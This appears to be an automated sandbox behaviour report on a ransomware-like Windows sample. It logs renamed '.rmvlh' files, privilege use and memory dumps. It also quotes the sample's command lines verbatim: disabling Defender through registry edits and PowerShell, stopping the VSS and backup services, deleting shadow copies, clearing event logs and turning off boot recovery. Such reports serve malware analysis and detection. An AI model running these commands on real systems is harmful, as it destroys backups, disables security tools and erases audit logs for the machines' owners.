| File opened for modification | C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_GSMon5bW7Y00.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\ShapeCollector.exe.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_2omFtnuKAhs0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_N5il6ELhfjo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipstr.xml | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_dz-fxIEJ84g0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\classlist.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_nm3JM2-ou6A0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_6B6bNlSAvns0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Ju4AU8GRM2E0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_vC3WbLcEwtQ0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Wzx_xEUbnPs0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR\msinfo32.exe.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_HUbrzoMZnFE0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-dayi.xml | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ja.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_VTyJRzoLAG80.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
"C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12c95" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12c95" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12c95" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/3820-118-0x0000000000000000-mapping.dmp
memory/3716-119-0x0000000000000000-mapping.dmp
memory/3736-120-0x0000000000000000-mapping.dmp
memory/3668-121-0x0000000000000000-mapping.dmp
memory/1292-122-0x0000000000000000-mapping.dmp
memory/660-123-0x0000000000000000-mapping.dmp
memory/928-124-0x0000000000000000-mapping.dmp
memory/2356-125-0x0000000000000000-mapping.dmp
memory/628-126-0x0000000000000000-mapping.dmp
memory/3748-127-0x0000000000000000-mapping.dmp
memory/1656-128-0x0000000000000000-mapping.dmp
memory/2292-129-0x0000000000000000-mapping.dmp
memory/524-130-0x0000000000000000-mapping.dmp
memory/3392-131-0x0000000000000000-mapping.dmp
memory/1416-132-0x0000000000000000-mapping.dmp
memory/1044-133-0x0000000000000000-mapping.dmp
memory/612-134-0x0000000000000000-mapping.dmp
memory/932-135-0x0000000000000000-mapping.dmp
memory/2648-136-0x0000000000000000-mapping.dmp
memory/2576-137-0x0000000000000000-mapping.dmp
memory/1180-138-0x0000000000000000-mapping.dmp
memory/2672-139-0x0000000000000000-mapping.dmp
memory/3688-140-0x0000000000000000-mapping.dmp
memory/1528-141-0x0000000000000000-mapping.dmp
memory/1716-142-0x0000000000000000-mapping.dmp
memory/1988-143-0x0000000000000000-mapping.dmp
memory/3960-144-0x0000000000000000-mapping.dmp
memory/2316-145-0x0000000000000000-mapping.dmp
memory/3296-146-0x0000000000000000-mapping.dmp
memory/3536-147-0x0000000000000000-mapping.dmp
memory/3264-148-0x0000000000000000-mapping.dmp
memory/1028-149-0x0000000000000000-mapping.dmp
memory/740-150-0x0000000000000000-mapping.dmp
memory/3616-151-0x0000000000000000-mapping.dmp
memory/3256-152-0x0000000000000000-mapping.dmp
memory/2216-153-0x0000000000000000-mapping.dmp
memory/3872-154-0x0000000000000000-mapping.dmp
memory/1908-155-0x0000000000000000-mapping.dmp
memory/3500-156-0x0000000000000000-mapping.dmp
memory/3916-157-0x0000000000000000-mapping.dmp
memory/924-158-0x0000000000000000-mapping.dmp
memory/960-159-0x0000000000000000-mapping.dmp
memory/632-160-0x0000000000000000-mapping.dmp
memory/436-161-0x0000000000000000-mapping.dmp
memory/2288-162-0x0000000000000000-mapping.dmp
memory/3972-163-0x0000000000000000-mapping.dmp
memory/2220-164-0x0000000000000000-mapping.dmp
memory/2024-165-0x0000000000000000-mapping.dmp
memory/728-166-0x0000000000000000-mapping.dmp
memory/1568-167-0x0000000000000000-mapping.dmp
memory/920-168-0x0000000000000000-mapping.dmp
memory/3312-169-0x0000000000000000-mapping.dmp
memory/1360-170-0x0000000000000000-mapping.dmp
memory/1712-171-0x0000000000000000-mapping.dmp
memory/4068-172-0x0000000000000000-mapping.dmp
memory/3308-173-0x0000000000000000-mapping.dmp
memory/2528-174-0x0000000000000000-mapping.dmp
memory/3000-175-0x0000000000000000-mapping.dmp
memory/2272-176-0x0000000000000000-mapping.dmp
memory/380-177-0x0000000000000000-mapping.dmp
memory/376-178-0x0000000000000000-mapping.dmp
memory/3236-179-0x0000000000000000-mapping.dmp
memory/1444-180-0x0000000000000000-mapping.dmp
memory/2824-181-0x0000000000000000-mapping.dmp
memory/980-183-0x0000019481D10000-0x0000019481D12000-memory.dmp
memory/980-182-0x0000019481D10000-0x0000019481D12000-memory.dmp
memory/980-184-0x0000019481D10000-0x0000019481D12000-memory.dmp
memory/980-185-0x0000019481D10000-0x0000019481D12000-memory.dmp
memory/980-186-0x0000019481D10000-0x0000019481D12000-memory.dmp
memory/980-187-0x00000194837C0000-0x00000194837E2000-memory.dmp
memory/980-188-0x0000019481D10000-0x0000019481D12000-memory.dmp
memory/980-189-0x0000019481D10000-0x0000019481D12000-memory.dmp
memory/980-190-0x0000019481D10000-0x0000019481D12000-memory.dmp
memory/980-191-0x0000019481D10000-0x0000019481D12000-memory.dmp
memory/980-192-0x000001949BD10000-0x000001949BD12000-memory.dmp
memory/980-193-0x000001949BD13000-0x000001949BD15000-memory.dmp
memory/980-194-0x000001949C020000-0x000001949C096000-memory.dmp
memory/980-195-0x0000019481D10000-0x0000019481D12000-memory.dmp
memory/980-215-0x000001949BD16000-0x000001949BD18000-memory.dmp
memory/980-220-0x0000019481D10000-0x0000019481D12000-memory.dmp
memory/980-221-0x0000019481D10000-0x0000019481D12000-memory.dmp
memory/3188-223-0x0000021A6B070000-0x0000021A6B072000-memory.dmp
memory/3188-224-0x0000021A6B070000-0x0000021A6B072000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
memory/3188-225-0x0000021A6B070000-0x0000021A6B072000-memory.dmp
memory/3188-226-0x0000021A6B070000-0x0000021A6B072000-memory.dmp
memory/3188-227-0x0000021A6B070000-0x0000021A6B072000-memory.dmp
memory/3188-228-0x0000021A6B390000-0x0000021A6B3B2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1eff030d649b7120d7e5fa8fb2be0154 |
| SHA1 | e96442fd73dcb64d6194155f2165fd61b3c482fa |
| SHA256 | eb55bfcfa829939b1647fc9753e628aff2d6a2e6a6fa88a9dafbe5a8489a9a3d |
| SHA512 | a5141f2570a58e2b86176b02ec03718c9452d095da52f930c3c48648c76b117465b290539054aa75667f33e746b91f37730aa387e2a9c41a10589ff66edb444a |
memory/3188-230-0x0000021A6B070000-0x0000021A6B072000-memory.dmp
memory/3188-232-0x0000021A6B070000-0x0000021A6B072000-memory.dmp
memory/3188-231-0x0000021A6B070000-0x0000021A6B072000-memory.dmp
memory/3188-233-0x0000021A6B070000-0x0000021A6B072000-memory.dmp
memory/3188-234-0x0000021A6BA00000-0x0000021A6BA76000-memory.dmp
memory/3188-237-0x0000021A6B0F3000-0x0000021A6B0F5000-memory.dmp
memory/980-235-0x000001949BD18000-0x000001949BD19000-memory.dmp
memory/3188-236-0x0000021A6B0F0000-0x0000021A6B0F2000-memory.dmp
memory/3188-238-0x0000021A6B070000-0x0000021A6B072000-memory.dmp
memory/3188-264-0x0000021A6B0F6000-0x0000021A6B0F8000-memory.dmp
memory/3188-265-0x0000021A6B0F8000-0x0000021A6B0F9000-memory.dmp